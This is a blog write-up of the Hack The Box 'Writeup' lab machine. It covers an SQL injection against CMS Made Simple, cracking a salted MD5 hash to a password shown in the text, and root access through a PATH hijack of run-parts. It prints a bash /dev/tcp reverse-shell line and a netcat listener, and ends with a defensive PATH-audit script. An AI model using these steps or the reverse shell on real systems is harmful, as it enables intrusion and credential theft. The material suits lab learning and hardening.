Wednesday, December 30, 2020

Hackthebox Writeup


As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).

Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.

Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup, which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’, something exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.


For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without an absolute path, so the shell would search the directories in the PATH variable in order:

Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
bash -i >& /dev/tcp/ 0>&1
After running chmod +x to make the above script executable, I started a netcat listener for the reverse shell:

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!
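The root step above is a classic PATH search-order hijack: a writable directory that comes before the real binary's directory in PATH lets anyone plant a same-named file that gets run instead. The following audit helper is an added example written for this post (not the box's or the author's code): given a command name and a PATH value, it walks the directories in order and reports every writable directory that is searched before the real command is found. The directory names in the example invocation are assumptions; run it with the PATH that the privileged process actually uses (e.g. the one pspy showed for sshd).

```shell
#!/bin/sh
# path_shadow_audit <command-name> <PATH-value>
# Walks PATH in search order. Any directory that is (a) searched before the
# directory containing the real command and (b) writable by the current user
# is reported as WRITABLE. Returns 1 if at least one such directory exists,
# 0 otherwise. This is the condition that made /usr/local/sbin and
# /usr/local/bin dangerous for run-parts in the writeup.
path_shadow_audit() {
    cmd=$1
    rest="$2:"          # trailing ':' so the last component is also consumed
    rc=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}  # first component
        rest=${rest#*:}  # drop it from the remainder
        [ -n "$dir" ] || dir=.   # an empty PATH entry means the current dir
        if [ -x "$dir/$cmd" ]; then
            # Real command found here; anything after this is never searched.
            printf 'REAL %s/%s\n' "$dir" "$cmd"
            return $rc
        fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            # Writable and searched before the real command: a planted
            # "$cmd" in this directory would shadow the real one.
            printf 'WRITABLE %s (searched before %s is found)\n' "$dir" "$cmd"
            rc=1
        fi
    done
    printf 'NOT FOUND %s\n' "$cmd"
    return $rc
}

# Example invocation against the current shell's PATH (assumed, for illustration).
path_shadow_audit run-parts "$PATH" || echo "AUDIT: a shadowing-writable directory exists"
```

Run the check as the unprivileged user you care about; a WRITABLE line before the REAL line is the finding to fix (remove write permission, or have the privileged caller use an absolute path).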




